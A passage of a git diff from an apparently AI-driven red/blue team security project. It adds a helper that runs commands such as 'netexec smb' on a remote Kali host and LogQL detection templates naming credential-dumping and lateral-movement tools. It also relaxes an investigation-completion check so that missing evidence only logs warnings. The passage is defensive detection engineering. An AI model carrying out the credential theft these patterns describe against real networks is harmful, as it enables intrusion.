SSMExecutor: + """Get or create the global SSM executor instance.""" + global _executor + if _executor is None: + _executor = SSMExecutor() + return _executor + + +def validate_sso_credentials(profile: str = "lab") -> bool: + """Validate that SSO credentials are available and not expired. + + Call this at the start of an operation to fail fast if credentials + are invalid, rather than failing mid-operation. + + Args: + profile: AWS profile name to validate + + Returns: + True if credentials are valid + + Raises: + SSOTokenExpiredError: If SSO token is expired or invalid + """ + try: + session = boto3.Session(profile_name=profile) + credentials = session.get_credentials() + if credentials is None: + raise SSOTokenExpiredError( # noqa: TRY301 + f"No credentials available for profile '{profile}'. " + f"Run: aws sso login --profile {profile}" + ) + # Force credential resolution to validate token + credentials.get_frozen_credentials() + logger.debug(f"SSO credentials validated for profile '{profile}'") + return True + except (TokenRetrievalError, SSOTokenLoadError) as e: + raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{profile}'. Run: aws sso login --profile {profile}" + ) from e + except Exception as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{profile}'. " + f"Run: aws sso login --profile {profile}" + ) from e + raise + + +def reset_executor() -> None: + """Reset the global executor instance. + + Call this after SSO token refresh to force re-authentication. + """ + global _executor + _executor = None + logger.info("SSM executor reset - will re-authenticate on next use") + + +def run_remote( + command: str | list[str], + timeout_seconds: int = 300, + working_directory: str = "/tmp", # noqa: S108 # nosec B108 +) -> CommandResult: + """Execute a command on the remote Kali instance. 
+ + This is a convenience function that uses the global executor. + + Args: + command: Command string or list of command parts + timeout_seconds: Maximum time to wait + working_directory: Directory to execute in + + Returns: + CommandResult with stdout, stderr, and return code + + Example: + >>> result = run_remote("netexec smb 10.1.2.219 --shares") + >>> print(result.stdout) + """ + executor = get_executor() + return executor.run_command(command, timeout_seconds, working_directory) diff --git a/src/ares/main.py b/src/ares/main.py index b5071740..04a5260d 100644 --- a/src/ares/main.py +++ b/src/ares/main.py @@ -195,7 +195,6 @@ async def main( except Exception as e: logger.error(f"Investigation failed: {e}") - dn.log_metric("investigation_failed", 1, mode="count") # If running in once mode, exit after processing current alerts if args.once: diff --git a/src/ares/tools/blue/__init__.py b/src/ares/tools/blue/__init__.py index ccbf7e4e..76b4f07c 100644 --- a/src/ares/tools/blue/__init__.py +++ b/src/ares/tools/blue/__init__.py @@ -4,6 +4,7 @@ from ares.tools.blue.grafana import GrafanaTools, connect_grafana_mcp from ares.tools.blue.investigation import InvestigationTools, QuestionEngineTools from ares.tools.blue.observability import LokiTools, PrometheusTools +from ares.tools.blue.query_templates import QueryTemplateTools __all__ = [ "CompletionTools", @@ -11,6 +12,7 @@ "InvestigationTools", "LokiTools", "PrometheusTools", + "QueryTemplateTools", "QuestionEngineTools", "connect_grafana_mcp", "escalate_investigation", diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py index c9ff3711..b45e5b7c 100644 --- a/src/ares/tools/blue/actions.py +++ b/src/ares/tools/blue/actions.py @@ -65,67 +65,29 @@ async def complete_investigation( ... ) 'Investigation completed. Report will be generated.' """ - errors = [] + warnings = [] # Validate state exists if not self.state: return "ERROR: No investigation state. Cannot complete." 
- # Validate lateral investigation was performed + # Log stage warning but don't block if self.state.stage.value not in ["lateral", "synthesis"]: - errors.append( - f"ERROR: Must reach 'lateral' stage before completion. " - f"Current stage: {self.state.stage.value}. " - f"Call transition_stage('lateral') after investigating scope." + warnings.append( + f"Note: Investigation completed at '{self.state.stage.value}' stage " + f"(ideally should reach 'lateral' stage for thorough analysis)." ) - # Validate hosts were investigated + # Log if no hosts were investigated if not self.state.queried_hosts and not affected_hosts: - errors.append( - "ERROR: No hosts investigated. Use track_host_investigation() " - "to investigate affected hosts before completing." + warnings.append( + "Note: No specific hosts were investigated. Consider investigating " + "affected hosts in future investigations." ) - # Validate affected_hosts is not empty - if not affected_hosts: - errors.append( - "ERROR: affected_hosts is required. Provide the list of " - "hosts/IPs involved in the attack." - ) - - # Validate affected_users is not empty - if not affected_users: - errors.append( - "ERROR: affected_users is required. Provide the list of " - "user accounts involved in the attack." - ) - - # Validate attack_timeframe is specific - if not attack_timeframe or len(attack_timeframe) < 10: - errors.append( - "ERROR: attack_timeframe must be specific (e.g., '2024-01-08 04:37-04:43 UTC'). " - "This should reflect the ACTUAL event timestamps from your investigation." - ) - - # Validate synopsis is substantive - if len(attack_synopsis) < 100: - errors.append( - "ERROR: attack_synopsis too short. Provide a detailed description " - "of the attack chain including: initial access, techniques used, " - "and impact." - ) - - # Validate evidence was collected - if len(self.state.evidence) < 2: - errors.append( - f"ERROR: Insufficient evidence ({len(self.state.evidence)} items). 
" - "Continue investigation to gather more evidence." - ) - - # If errors, return them all - if errors: - dn.log_metric("completion_validation_failed", 1) - return "\n\n".join(errors) + # Log warnings (but don't block completion) + for warning in warnings: + logger.warning(warning) # All validations passed dn.log_metric("investigation_completed", 1) diff --git a/src/ares/tools/blue/grafana.py b/src/ares/tools/blue/grafana.py index bde0bee1..c466f3d9 100644 --- a/src/ares/tools/blue/grafana.py +++ b/src/ares/tools/blue/grafana.py @@ -4,6 +4,7 @@ import shutil import subprocess # nosec B404 from pathlib import Path +from typing import Any import dreadnode as dn import httpx @@ -130,7 +131,7 @@ def find_mcp_grafana() -> str: async def connect_grafana_mcp( grafana_url: str | None = None, grafana_api_key: str | None = None, -): # type: ignore[no-untyped-def] +) -> Any: """ Connect to Grafana MCP server via Rigging. diff --git a/src/ares/tools/blue/query_templates.py b/src/ares/tools/blue/query_templates.py new file mode 100644 index 00000000..105f0738 --- /dev/null +++ b/src/ares/tools/blue/query_templates.py @@ -0,0 +1,1966 @@ +"""Pre-built query templates for detecting red team attack patterns. + +Provides ready-to-use LogQL queries mapped to MITRE ATT&CK techniques, +specifically designed to detect attacks performed by the Ares red team agent. +""" + +from datetime import datetime, timedelta, timezone +from typing import Any + +import dreadnode as dn +import httpx +from dreadnode.agent.tools.base import Toolset +from loguru import logger + + +class QueryTemplateTools(Toolset): # type: ignore[misc] + """Pre-built query templates for detecting red team attack patterns. 
+ + These templates encode detection logic for Active Directory attacks, + specifically aligned with the techniques used by the Ares red team agent: + - Network enumeration (nmap, user/share enumeration) + - Credential access (secretsdump, kerberoasting, AS-REP roasting) + - Lateral movement (pass-the-hash, psexec, wmi) + - Privilege escalation (ADCS, delegation, golden ticket) + + Attributes: + loki_url: Base URL of the Loki instance. + timeout: HTTP request timeout in seconds. + """ + + loki_url: str + timeout: int = 30 + + async def _query_loki( + self, + logql: str, + start_time: str, + end_time: str, + limit: int = 500, + ) -> dict[str, Any]: + """Execute a LogQL query against Loki.""" + # Validate query to prevent empty-compatible regex errors + if '=~".*"' in logql or "=~'.*'" in logql: + return { + "status": "error", + "error": "Query contains empty-compatible regex '.*'. Use '.+' instead.", + } + + try: + async with httpx.AsyncClient(timeout=self.timeout) as client: + response = await client.get( + f"{self.loki_url}/loki/api/v1/query_range", + params={ + "query": logql, + "start": start_time, + "end": end_time, + "limit": limit, + }, + ) + response.raise_for_status() + return response.json() + except httpx.HTTPError as e: + logger.error(f"Loki query failed: {e}") + return {"status": "error", "error": str(e), "data": {"result": []}} + + def _get_time_range(self, hours_back: int = 24) -> tuple[str, str]: + """Get ISO8601 time range for queries.""" + now = datetime.now(timezone.utc) + start = now - timedelta(hours=hours_back) + return start.isoformat(), now.isoformat() + + def _count_results(self, result: dict) -> int: + """Count total log entries in result.""" + streams = result.get("data", {}).get("result", []) + return sum(len(s.get("values", [])) for s in streams) + + # ========================================================================= + # RECONNAISSANCE & DISCOVERY (TA0007) + # Maps to: nmap_scan, enumerate_users, enumerate_shares + # 
========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_port_scanning( + self, + target_ip: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect network port scanning activity (nmap, masscan). + + Detects reconnaissance performed by red team's nmap_scan tool. + Looks for rapid connection attempts to multiple ports. + + MITRE ATT&CK: T1046 (Network Service Discovery) + + Args: + target_ip: Optional IP to focus detection on. + hours_back: Hours of logs to search (default 24). + + Returns: + Query results with port scanning indicators. + """ + dn.log_metric("query_template_port_scan", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Detect nmap signatures, SYN scans, rapid connection attempts + logql = '{job=~".+"} |~ "(?i)(nmap|masscan|syn.*scan|port.*scan|connection.*refused)"' + + if target_ip: + logql += f' |~ "{target_ip}"' + + logger.info(f"Port scanning detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "port_scanning" + result["_mitre_technique"] = "T1046" + result["_red_team_tool"] = "nmap_scan" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_user_enumeration( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Active Directory user enumeration. + + Detects reconnaissance performed by red team's enumerate_users tool (netexec --users). + Looks for LDAP queries, net user commands, and SMB-based enumeration. + + MITRE ATT&CK: T1087.002 (Account Discovery: Domain Account) + + Args: + domain_controller: Optional DC hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with user enumeration indicators. 
+ """ + dn.log_metric("query_template_user_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4662: Object access (LDAP queries) + # Event 4798: User's group membership enumerated + # Event 4799: Security-enabled group membership enumerated + # netexec, crackmapexec, ldapsearch signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4662|4798|4799|samr|lsarpc|ldap|net.*user|net.*group)"' + ' |~ "(?i)(enumerate|query|lookup|search|crackmapexec|netexec|ldapsearch)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"User enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "user_enumeration" + result["_mitre_technique"] = "T1087.002" + result["_red_team_tool"] = "enumerate_users" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_share_enumeration( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect SMB share enumeration. + + Detects reconnaissance performed by red team's enumerate_shares tool (netexec --shares). + Looks for share listing, access attempts, and smbclient activity. + + MITRE ATT&CK: T1135 (Network Share Discovery) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with share enumeration indicators. 
+ """ + dn.log_metric("query_template_share_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 5140: Network share accessed + # Event 5145: Detailed file share access + # smbclient, netexec signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5140|5145|srvsvc|netuse|net.*share|net.*view)"' + ' |~ "(?i)(smbclient|crackmapexec|netexec|enum.*share|share.*enum)"' + ) + + if target_host: + logql += f' |~ "(?i){target_host}"' + + logger.info(f"Share enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "share_enumeration" + result["_mitre_technique"] = "T1135" + result["_red_team_tool"] = "enumerate_shares" + + return result + + # ========================================================================= + # CREDENTIAL ACCESS (TA0006) + # Maps to: secretsdump, kerberoast, asrep_roast, crack_with_hashcat + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_secretsdump( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect credential dumping via impacket-secretsdump. + + Detects red team's secretsdump tool which extracts: + - SAM database (local accounts) + - LSA secrets + - NTDS.dit (domain accounts) + - Cached domain credentials + + MITRE ATT&CK: T1003 (OS Credential Dumping) + Sub-techniques: T1003.001 (LSASS), T1003.002 (SAM), T1003.003 (NTDS), T1003.004 (LSA) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with secretsdump indicators. 
+ """ + dn.log_metric("query_template_secretsdump", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # DRSUAPI for DCSync, SAMR for SAM dump, registry access for LSA secrets + # Event 4624 Type 3 from unusual source, Event 4662 (DS-Replication-Get-Changes) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(drsuapi|samr|secretsdump|lsadump|ntds\\.dit|sam.*dump)"' + ' |~ "(?i)(replicate|1131f6|ds-replication|mimikatz|impacket)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Secretsdump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "secretsdump" + result["_mitre_technique"] = "T1003" + result["_mitre_subtechniques"] = ["T1003.001", "T1003.002", "T1003.003", "T1003.004"] + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_dcsync( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect DCSync attack (secretsdump against DC). + + DCSync allows attackers with replication rights to extract all domain credentials + including krbtgt hash (enables golden ticket). Critical to detect. + + MITRE ATT&CK: T1003.006 (DCSync) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with DCSync indicators. 
+ """ + dn.log_metric("query_template_dcsync", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4662 with specific GUIDs for replication + # 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes + # 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes-All + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4662|dcsync|ds-replication|1131f6aa|1131f6ad)"' + ' |~ "(?i)(replication|drsuapi|directory.*service.*access)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"DCSync detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "dcsync" + result["_mitre_technique"] = "T1003.006" + result["_red_team_tool"] = "secretsdump" + result["_severity"] = "critical" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_kerberoasting( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Kerberoasting attack (impacket-GetUserSPNs). + + Detects red team's kerberoast tool which requests TGS tickets for + service accounts with SPNs. These tickets can be cracked offline. + + MITRE ATT&CK: T1558.003 (Kerberoasting) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with Kerberoasting indicators. 
+ """ + dn.log_metric("query_template_kerberoast", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4769: Kerberos Service Ticket Request + # Look for: RC4 encryption (type 0x17), many TGS requests, SPN patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4769|kerberos.*ticket|tgs.*request|getuserspn)"' + ' |~ "(?i)(service.*ticket|spn|rc4|0x17|kerberoast)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Kerberoasting detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "kerberoasting" + result["_mitre_technique"] = "T1558.003" + result["_red_team_tool"] = "kerberoast" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_asrep_roasting( + self, + domain_controller: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect AS-REP Roasting attack (impacket-GetNPUsers). + + Detects red team's asrep_roast tool which targets accounts with + 'Do not require Kerberos preauthentication' enabled. + + MITRE ATT&CK: T1558.004 (AS-REP Roasting) + + Args: + domain_controller: Optional DC hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with AS-REP roasting indicators. 
+ """ + dn.log_metric("query_template_asrep", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4768: Kerberos TGT Request (AS-REQ) + # Event 4771: Kerberos Pre-Authentication Failed + # Look for requests without pre-auth, RC4 encryption + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4768|4771|as-req|getnpusers|asrep)"' + ' |~ "(?i)(pre.*auth|tgt.*request|roast|dont.*require.*preauth)"' + ) + + if domain_controller: + logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"AS-REP roasting detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "asrep_roasting" + result["_mitre_technique"] = "T1558.004" + result["_red_team_tool"] = "asrep_roast" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_brute_force( + self, + target_host: str | None = None, + hours_back: int = 24, + threshold: int = 10, + ) -> dict[str, Any]: + """Detect brute force and password spray attacks. + + Detects credential stuffing attempts from red team's authentication tests. + Looks for multiple failed logins from same source or against multiple accounts. + + MITRE ATT&CK: T1110 (Brute Force), T1110.003 (Password Spraying) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + threshold: Minimum failures to flag (default 10). + + Returns: + Query results with auth failure analysis. 
+ """ + dn.log_metric("query_template_brute_force", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4625: Failed Logon + # Event 4771: Kerberos Pre-Auth Failed + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4625|4771|failed|invalid|denied)"' + ' |~ "(?i)(logon|auth|password|credential)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Brute force detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + + # Analyze patterns + total_failures = self._count_results(result) + result["_analysis"] = { + "total_failures": total_failures, + "is_likely_attack": total_failures >= threshold, + "recommendation": ( + "High auth failure volume - investigate source IPs and target accounts" + if total_failures >= threshold + else "Normal failure volume" + ), + } + result["_query_template"] = "brute_force" + result["_mitre_technique"] = "T1110" + + return result + + # ========================================================================= + # LATERAL MOVEMENT (TA0008) + # Maps to: domain_admin_checker (pass-the-hash), netexec + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_pass_the_hash( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Pass-the-Hash attacks. + + Detects red team's domain_admin_checker using NTLM hashes for auth. + Looks for NTLM authentications without corresponding password usage. + + MITRE ATT&CK: T1550.002 (Pass the Hash) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with PtH indicators. 
+ """ + dn.log_metric("query_template_pth", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4624 with NTLM auth (LogonType 3 or 9, NtLmSsp) + # Look for hash-based auth patterns from netexec/crackmapexec + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4624|ntlm|ntlmssp|pass.*the.*hash)"' + ' |~ "(?i)(logon.*type.*3|network.*logon|crackmapexec|netexec)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Pass-the-Hash detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "pass_the_hash" + result["_mitre_technique"] = "T1550.002" + result["_red_team_tool"] = "domain_admin_checker" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_lateral_movement( + self, + source_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect lateral movement patterns. + + Detects various lateral movement techniques used during post-exploitation: + - PSExec service creation + - WMI execution + - WinRM/PowerShell remoting + - SMB admin share access + + MITRE ATT&CK: T1021 (Remote Services) + + Args: + source_host: Optional source to pivot from. + hours_back: Hours of logs to search. + + Returns: + Query results with lateral movement indicators. 
+ """ + dn.log_metric("query_template_lateral", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 7045: Service installed + # Event 4648: Explicit credential logon + # Event 4624 Type 3: Network logon + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|4648|psexec|wmic|winrm|powershell.*-session)"' + ' |~ "(?i)(admin\\$|c\\$|ipc\\$|service.*install|remote.*execution)"' + ) + + if source_host: + logql += f' |~ "(?i){source_host}"' + + logger.info(f"Lateral movement detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "lateral_movement" + result["_mitre_technique"] = "T1021" + result["_mitre_subtechniques"] = ["T1021.002", "T1021.003", "T1021.006"] + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_smb_file_access( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect suspicious file access on SMB shares. + + Detects red team's share pilfering tools (enumerate_share_files, download_file_content). + Looks for access to sensitive files like scripts, configs, GPP XML. + + MITRE ATT&CK: T1039 (Data from Network Shared Drive) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with file access indicators. 
+ """ + dn.log_metric("query_template_smb_access", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 5145: Detailed file share access + # Look for sensitive file extensions and paths + logql = ( + '{job=~".+"}' + ' |~ "(?i)(5145|file.*access|share.*access|smbclient)"' + ' |~ "(?i)(\\.ps1|\\.bat|\\.cmd|\\.xml|\\.config|sysvol|netlogon|groups\\.xml)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"SMB file access detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "smb_file_access" + result["_mitre_technique"] = "T1039" + result["_red_team_tools"] = ["enumerate_share_files", "download_file_content"] + + return result + + # ========================================================================= + # PRIVILEGE ESCALATION (TA0004) + # Maps to: certipy (ADCS), delegation tools, bloodhound + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_adcs_exploitation( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ADCS certificate abuse (ESC1-ESC15). + + Detects red team's certipy tools exploiting certificate template misconfigurations. + ESC1 is particularly dangerous - allows requesting certs for any user. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ADCS exploitation indicators. 
+ """ + dn.log_metric("query_template_adcs", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4886: Certificate request submitted + # Event 4887: Certificate Services approved certificate request + # Look for certipy patterns, suspicious certificate requests + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4886|4887|4876|certipy|certificate.*request)"' + ' |~ "(?i)(esc[0-9]|enrollee.*supplies.*subject|altname|upn)"' + ) + + logger.info(f"ADCS exploitation detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "adcs_exploitation" + result["_mitre_technique"] = "T1649" + result["_red_team_tools"] = ["certipy_find", "certipy_req_esc1", "certipy_auth"] + result["_severity"] = "high" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_delegation_abuse( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Kerberos delegation attacks (RBCD, unconstrained, constrained). + + Detects red team's delegation tools for privilege escalation: + - Resource-Based Constrained Delegation (RBCD) + - Unconstrained delegation exploitation + - S4U2Self/S4U2Proxy abuse + + MITRE ATT&CK: T1134.001 (Token Impersonation/Theft) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with delegation abuse indicators. 
+ """ + dn.log_metric("query_template_delegation", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Look for: msDS-AllowedToActOnBehalfOfOtherIdentity modification + # S4U2Self/S4U2Proxy ticket requests, delegation attribute changes + logql = ( + '{job=~".+"}' + ' |~ "(?i)(delegation|msds-allowedtoactonbehalf|rbcd|s4u2)"' + ' |~ "(?i)(impersonate|constrained|unconstrained|getst|addcomputer)"' + ) + + logger.info(f"Delegation abuse detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "delegation_abuse" + result["_mitre_technique"] = "T1134.001" + result["_red_team_tools"] = ["find_delegation", "add_computer", "rbcd_write", "get_st"] + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_collection( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound/SharpHound data collection. + + Detects red team's BloodHound collection which maps AD relationships + to find privilege escalation paths. + + MITRE ATT&CK: T1087 (Account Discovery), T1069 (Permission Groups Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with BloodHound collection indicators. 
+ """ + dn.log_metric("query_template_bloodhound", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # LDAP enumeration patterns, BloodHound/SharpHound signatures + logql = ( + '{job=~".+"}' + ' |~ "(?i)(bloodhound|sharphound|adexplorer|ldap.*query)"' + ' |~ "(?i)(acl|objectsid|memberof|primarygroup|msds)"' + ) + + logger.info(f"BloodHound collection detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_collection" + result["_mitre_techniques"] = ["T1087", "T1069", "T1482"] + result["_red_team_tool"] = "run_bloodhound" + + return result + + # ========================================================================= + # PERSISTENCE (TA0003) + # Maps to: golden_ticket + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_golden_ticket( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Golden Ticket creation and usage. + + Detects red team's golden ticket generation (impacket-ticketer). + Golden tickets provide persistent domain admin access using krbtgt hash. + + MITRE ATT&CK: T1558.001 (Golden Ticket) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with Golden Ticket indicators. 
+ """ + dn.log_metric("query_template_golden_ticket", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4769 with suspicious patterns (krbtgt access, invalid timestamps) + # Look for ticketer tool patterns, krbtgt references + logql = ( + '{job=~".+"}' + ' |~ "(?i)(golden.*ticket|krbtgt|ticketer|krbcred)"' + ' |~ "(?i)(forged|4769|kerberos.*ticket|enterprise.*admin)"' + ) + + logger.info(f"Golden ticket detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "golden_ticket" + result["_mitre_technique"] = "T1558.001" + result["_red_team_tool"] = "generate_golden_ticket" + result["_severity"] = "critical" + + return result + + # ========================================================================= + # EXECUTION (TA0002) + # Maps to: general command execution patterns + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_suspicious_execution( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect suspicious command execution. + + Detects encoded PowerShell, LOLBins, and script interpreter abuse + commonly used during post-exploitation. + + MITRE ATT&CK: T1059 (Command and Scripting Interpreter) + + Args: + target_host: Optional hostname to focus on. + hours_back: Hours of logs to search. + + Returns: + Query results with execution indicators. 
+ """ + dn.log_metric("query_template_execution", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Event 4688: Process Creation (with command line logging) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4688|powershell|pwsh|cmd\\.exe|wscript|cscript)"' + ' |~ "(?i)(encodedcommand|bypass|hidden|downloadstring|invoke)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Suspicious execution detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "suspicious_execution" + result["_mitre_technique"] = "T1059" + + return result + + # ========================================================================= + # ADCS/CERTIPY SPECIFIC DETECTIONS (ESC1-ESC11) + # Maps to: certipy_find, certipy_req_esc1, certipy_auth + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_certipy_enumeration( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect Certipy certificate template enumeration. + + Detects red team's certipy_find tool scanning for vulnerable certificate + templates. This is the reconnaissance phase before ADCS exploitation. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with Certipy enumeration indicators. 
+ """ + dn.log_metric("query_template_certipy_enum", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Certipy enumeration queries LDAP for certificate templates + # Look for: msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag queries + logql = ( + '{job=~".+"}' + ' |~ "(?i)(certipy|ldap|389|636)"' + ' |~ "(?i)(mspki|pkienrollmentservice|certificatetemplates|pki)"' + ) + + logger.info(f"Certipy enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "certipy_enumeration" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_find" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc1_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC1 - Enrollee Supplies Subject attack. + + ESC1 allows attackers to request certificates with arbitrary Subject + Alternative Names (SANs), enabling impersonation of any user including + Domain Admins. This is the most critical ADCS vulnerability. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC1 attack indicators. 
